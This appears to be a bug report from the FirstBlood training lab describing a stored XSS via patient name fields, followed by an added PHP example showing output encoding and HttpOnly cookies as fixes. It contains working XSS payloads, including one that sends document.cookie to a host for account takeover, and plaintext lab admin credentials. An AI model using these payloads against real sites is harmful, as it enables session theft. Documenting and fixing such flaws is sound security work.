FirstBlood-#201 — Stored XSS on /drpanel/drapi/query.php
This issue was discovered on FirstBlood v1
On 2021-05-11, 0xblackbird Level 5 reported:
Hi! I found another stored cross-site scripting issue but this time it's on /drpanel/drapi/query.php?aptid={ID}.
Update
The payload works on every browser, on Firefox it needs a tab change or a click. But on Chrome (Brave browser), it worked right away for me. No user interaction needed.
Steps to reproduce
- Visit /book-appointment.html and fill in the required details except the first name and last name fields. On these fields, paste in the following payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm%600%60">.
- Now, simply log in using the administrator account with the following credentials: drAdmin:s2Wpx5zfUvlSZhspJ.
- On the dashboard, inspect the last appointment and copy the ID.
- Navigate to /drpanel/drapi/query.php?aptid={ID}; the XSS should trigger.
- This is just a simple XSS; we can go for account takeover by stealing cookies. Repeat the above steps, but in the first step change the payload to the following: <xss/id="1"/tabindex="1"/autofocus/onfocusin="window.location.href='http://localhost/'%2bdocument.cookie">
- When we now visit /drpanel/drapi/query.php?aptid={ID}, we get redirected to http://localhost/${cookies}
This cookie can later be retrieved by the attacker and by that, fully compromise an administrator account.
Impact
Taking over an account with higher privileges is possible by stealing the cookies. This is because we could execute JavaScript on the administrator's behalf.
Background
I already had success with custom HTML tags, which gave me the idea to go for custom tags again. It also worked this time, so it's probably a site-wide XSS filter issue. Thanks for the fun and realistic challenge! I really like these!
Kind regards,
0xblackbird
P2 High
Endpoint: /drpanel/drapi/query.php?aptid={ID}
Parameter: fname, lname
Payload: <xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm`0`">
FirstBlood ID: 10
Vulnerability Type: Stored XSS
When creating an appointment, it is possible to get stored XSS on /drapi/query.php via the patient's name.
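The report describes a patient name stored at booking time and later rendered into the doctor panel, with a made-up tag name slipping past what the reporter suspects is a tag blocklist. The following is an added example, not FirstBlood's own code: it contrasts a blocklist filter with context-aware output encoding at render time, using the payload from the report as constructed input. The record shape, the function names and the blocklist regex are assumptions for illustration; `htmlspecialchars` and `session_set_cookie_params` are standard PHP.

```php
<?php
// Added example (not FirstBlood's own code). The report says the patient's
// first/last name is stored when an appointment is booked and later rendered
// into HTML by /drpanel/drapi/query.php. A tag-name blocklist lets a custom
// tag such as <xss ...> with an event-handler attribute through; encoding the
// value for its HTML context at output time does not.

// Assumed shape of a stored appointment record; values are constructed.
// The fname value is the payload quoted in the report.
$appointment = [
    'id'    => 10,
    'fname' => '<xss/id="1"/tabindex="1"/autofocus/onfocusin="confirm`0`">',
    'lname' => "O'Brien",
];

// Weak approach: strip a list of known-dangerous tag names. Anything not on
// the list, including an invented tag carrying onfocusin=..., passes untouched.
function blocklistFilter(string $value): string
{
    return preg_replace('/<\/?(script|img|svg|iframe|body|input)\b[^>]*>/i', '', $value);
}

// Hardened approach: encode for the HTML text/attribute context at the point
// of output. ENT_QUOTES also encodes single quotes, so the same helper is safe
// inside single- or double-quoted attribute values.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable render: concatenates the (blocklist-filtered) raw name into markup.
function renderVulnerable(array $apt): string
{
    $name = blocklistFilter($apt['fname']) . ' ' . blocklistFilter($apt['lname']);
    return '<p class="patient">Patient: ' . $name . '</p>';
}

// Fixed render: every untrusted value is encoded exactly where it is inserted.
function renderSafe(array $apt): string
{
    return '<p class="patient">Patient: ' . h($apt['fname']) . ' ' . h($apt['lname']) . '</p>';
}

// Regression check for a unit test: an untrusted value must never survive as
// the start of a tag in the rendered output.
function containsTag(string $html, string $tagName): bool
{
    return (bool) preg_match('/<' . preg_quote($tagName, '/') . '[\s\/>]/i', $html);
}

// Defence in depth against the cookie-theft escalation in the report: mark the
// session cookie HttpOnly so document.cookie cannot read it even if an XSS
// does fire. Call before session_start() in the real application.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);

echo 'vulnerable: ', renderVulnerable($appointment), PHP_EOL;
echo 'safe:       ', renderSafe($appointment), PHP_EOL;
echo 'tag survives in vulnerable output: ', var_export(containsTag(renderVulnerable($appointment), 'xss'), true), PHP_EOL;
echo 'tag survives in safe output:       ', var_export(containsTag(renderSafe($appointment), 'xss'), true), PHP_EOL;
```

Run with `php example.php`. The vulnerable render prints the `<xss ...>` tag verbatim because its name is not on the blocklist, while the safe render turns `<`, `>` and the quotes into entities so the browser shows the payload as text. The HttpOnly flag does not fix the injection, but it removes the `document.cookie` exfiltration path the second payload in the report relies on.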